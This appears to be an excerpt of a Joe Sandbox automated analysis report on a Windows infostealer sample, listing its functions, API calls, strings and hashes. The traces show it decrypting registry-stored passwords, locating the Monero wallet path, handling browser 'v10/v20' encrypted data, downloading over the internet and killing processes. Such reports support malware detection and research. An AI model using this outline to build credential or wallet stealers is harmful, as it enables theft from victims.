                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                        • String ID: :
                        • API String ID: 398153587-3653984579
                        • Opcode ID: f575156f847d32a461e28f9d9bc6580e3d498d24f5eb8f181d02767730c06929
                        • Instruction ID: 236c2bd5d7d1ac2bf2452a268d9901a4e7355e91a099b30888b3fe7901b1334e
                        • Opcode Fuzzy Hash: f575156f847d32a461e28f9d9bc6580e3d498d24f5eb8f181d02767730c06929
                        • Instruction Fuzzy Hash: E2317272A04228EFCB20DB68DC449BBB779FB85704F19851EE60593240DB7DA942CB59
                        Function 005081B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 0050820C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00508243
                        • lstrlen.KERNEL32(00000000), ref: 00508260
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00508297
                        • lstrlen.KERNEL32(00000000), ref: 005082B4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005082EB
                        • lstrlen.KERNEL32(00000000), ref: 00508308
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00508337
                        • lstrlen.KERNEL32(00000000), ref: 00508351
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00508380
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 02798ac02a48e47bac7b0d1df9233ff37c5ac4bb2c77b814cf8915da8907f245
                        • Instruction ID: e500f73402ef65eeb7d2f5aded5ad39bbd2eeccc52f44142acccb52f2a980704
                        • Opcode Fuzzy Hash: 02798ac02a48e47bac7b0d1df9233ff37c5ac4bb2c77b814cf8915da8907f245
                        • Instruction Fuzzy Hash: 9A51AF70A016069BEB14DF29DD58EBEBBA8FF40700F004914AD96DB284DB34ED61CBD0
                        Function 004F77D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004F7805
                        • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 004F784A
                        • StrStrA.SHLWAPI(?,Password), ref: 004F78B8
                          • Part of subcall function 004F7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 004F775E
                          • Part of subcall function 004F7750: RtlAllocateHeap.NTDLL(00000000), ref: 004F7765
                          • Part of subcall function 004F7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004F778D
                          • Part of subcall function 004F7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004F77AD
                          • Part of subcall function 004F7750: LocalFree.KERNEL32(?), ref: 004F77B7
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F78EC
                        • HeapFree.KERNEL32(00000000), ref: 004F78F3
                        • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 004F7A35
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                        • String ID: Password
                        • API String ID: 356768136-3434357891
                        • Opcode ID: fffd2302aceaaab046520cb87b0e17cb6d97f0279ee0f84a3bbb89577f99cc8e
                        • Instruction ID: e53b99d31a0fe8e24bb0aeb674dab99ee5b0f9bc0526c779bce697623fd21e06
                        • Opcode Fuzzy Hash: fffd2302aceaaab046520cb87b0e17cb6d97f0279ee0f84a3bbb89577f99cc8e
                        • Instruction Fuzzy Hash: E37120B1D0021DABDB10DF95DC80EEEB7B9FF44300F14856AE609A7240EB795A85CB95
                        Function 004F1120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F1135
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F113C
                        • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004F1159
                        • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 004F1173
                        • RegCloseKey.ADVAPI32(?), ref: 004F117D
                        Strings
                        • wallet_path, xrefs: 004F116D
                        • SOFTWARE\monero-project\monero-core, xrefs: 004F114F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                        • API String ID: 3225020163-4244082812
                        • Opcode ID: d816eac6748311975f3cc63408cd931cad1548c93495509d7e596760920d5035
                        • Instruction ID: 26f5182d9abd8b2c9d4aadf6e616124cd8d23a07b62c17f42bc9a7928c56597e
                        • Opcode Fuzzy Hash: d816eac6748311975f3cc63408cd931cad1548c93495509d7e596760920d5035
                        • Instruction Fuzzy Hash: 3CF0907564031DBBE7209BE0AD4DFEB7B7CEB04715F004054FF05E2280EAB45A4587A8
                        Function 004F9DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                        Download Yara Rule
                        APIs
                        • memcmp.MSVCRT(?,v20,00000003), ref: 004F9E04
                        • memcmp.MSVCRT(?,v10,00000003), ref: 004F9E42
                        • LocalAlloc.KERNEL32(00000040), ref: 004F9EA7
                          • Part of subcall function 005171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005171FE
                        • lstrcpy.KERNEL32(00000000,00524C48), ref: 004F9FB2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpymemcmp$AllocLocal
                        • String ID: @$v10$v20
                        • API String ID: 102826412-278772428
                        • Opcode ID: a3557be85a6ec5ce063f159ab93a2a1ce8b7446bd8695a337bdcba94f418015e
                        • Instruction ID: 41ca7911a836a7a9f127b825b065abf05dbf79913fdb674301ef5d9aa950e0d2
                        • Opcode Fuzzy Hash: a3557be85a6ec5ce063f159ab93a2a1ce8b7446bd8695a337bdcba94f418015e
                        • Instruction Fuzzy Hash: EA51B331A1020D9BDB10EF69DC45BAE7BB4FF44318F15402AFA09EB291DBB8DD518B94
                        Function 004F5640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004F565A
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F5661
                        • InternetOpenA.WININET(0051CFEC,00000000,00000000,00000000,00000000), ref: 004F5677
                        • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 004F5692
                        • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004F56BC
                        • memcpy.MSVCRT(00000000,?,00000001), ref: 004F56E1
                        • InternetCloseHandle.WININET(?), ref: 004F56FA
                        • InternetCloseHandle.WININET(00000000), ref: 004F5701
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                        • String ID:
                        • API String ID: 1008454911-0
                        • Opcode ID: 4c2f3ac0ee2a7d49d35c8862f9478f61ee9652a7a3698dc815bdeed99c1f0a4a
                        • Instruction ID: 9e58e2bab306a284d509e8b3e2b85551ff8f43a1a3db8be92ea371a5c73d797c
                        • Opcode Fuzzy Hash: 4c2f3ac0ee2a7d49d35c8862f9478f61ee9652a7a3698dc815bdeed99c1f0a4a
                        • Instruction Fuzzy Hash: C1414D70A01609DFDB24DF55DD88BABB7E4FF48300F14C06AE7089B291E7799942CB99
                        Function 00514740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00514759
                        • Process32First.KERNEL32(00000000,00000128), ref: 00514769
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0051477B
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051479C
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 005147AB
                        • CloseHandle.KERNEL32(00000000), ref: 005147B2
                        • Process32Next.KERNEL32(00000000,00000128), ref: 005147C0
                        • CloseHandle.KERNEL32(00000000), ref: 005147CB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                        • String ID:
                        • API String ID: 3836391474-0
                        • Opcode ID: 2b6bcbc6e5d880f690b965d808ba93afb9a9cebb567878a888b8820e54ace875
                        • Instruction ID: a5a309b2b1060e7c2cd057954bd31788d441e2e269f1f3e948893600a3ee0e2e
                        • Opcode Fuzzy Hash: 2b6bcbc6e5d880f690b965d808ba93afb9a9cebb567878a888b8820e54ace875
                        • Instruction Fuzzy Hash: BD01B571601219ABF7305B609D89FEA7BBCFB08B51F045184FA09D10C1EF799DC28E69
                        Function 005083E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00508435
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050846C
                        • lstrlen.KERNEL32(00000000), ref: 005084B2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005084E9
                        • lstrlen.KERNEL32(00000000), ref: 005084FF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050852E
                        • StrCmpCA.SHLWAPI(00000000,00524C3C), ref: 0050853E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 04734e210ff9401e5e253a332d2da348b70a2b7469ac9f6c12f2ff6cabe801c8
                        • Instruction ID: 6024e2cb92f28b01d013e8999fe786fed41102a4825c8a12539b190ab54a2bc2
                        • Opcode Fuzzy Hash: 04734e210ff9401e5e253a332d2da348b70a2b7469ac9f6c12f2ff6cabe801c8
                        • Instruction Fuzzy Hash: E6516D71A00206AFDB24DF69D984E6BBBF9FF44300F148459EC86DB295EB34E9518B50
                        Function 00512910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00512925
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0051292C
                        • RegOpenKeyExA.ADVAPI32(80000002,0102B818,00000000,00020119,005128A9), ref: 0051294B
                        • RegQueryValueExA.ADVAPI32(005128A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00512965
                        • RegCloseKey.ADVAPI32(005128A9), ref: 0051296F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: dd55570bf962c6a208517fc6fe3bad57e936e0fde4334e9402a4d37874aaecc8
                        • Instruction ID: cbacf3edb1b4f4f8d216740e0e8ad1e53ba94d43d1db3e3d47fea803b26a9ddb
                        • Opcode Fuzzy Hash: dd55570bf962c6a208517fc6fe3bad57e936e0fde4334e9402a4d37874aaecc8
                        • Instruction Fuzzy Hash: 0001BC75600219ABE720CBA49C59EEB7BACFB48711F148098FE4597280EA355A4687A4
                        Function 00512880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00512895
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0051289C
                          • Part of subcall function 00512910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00512925
                          • Part of subcall function 00512910: RtlAllocateHeap.NTDLL(00000000), ref: 0051292C
                          • Part of subcall function 00512910: RegOpenKeyExA.ADVAPI32(80000002,0102B818,00000000,00020119,005128A9), ref: 0051294B
                          • Part of subcall function 00512910: RegQueryValueExA.ADVAPI32(005128A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00512965
                          • Part of subcall function 00512910: RegCloseKey.ADVAPI32(005128A9), ref: 0051296F
                        • RegOpenKeyExA.ADVAPI32(80000002,0102B818,00000000,00020119,00509500), ref: 005128D1
                        • RegQueryValueExA.ADVAPI32(00509500,0103DCC0,00000000,00000000,00000000,000000FF), ref: 005128EC
                        • RegCloseKey.ADVAPI32(00509500), ref: 005128F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
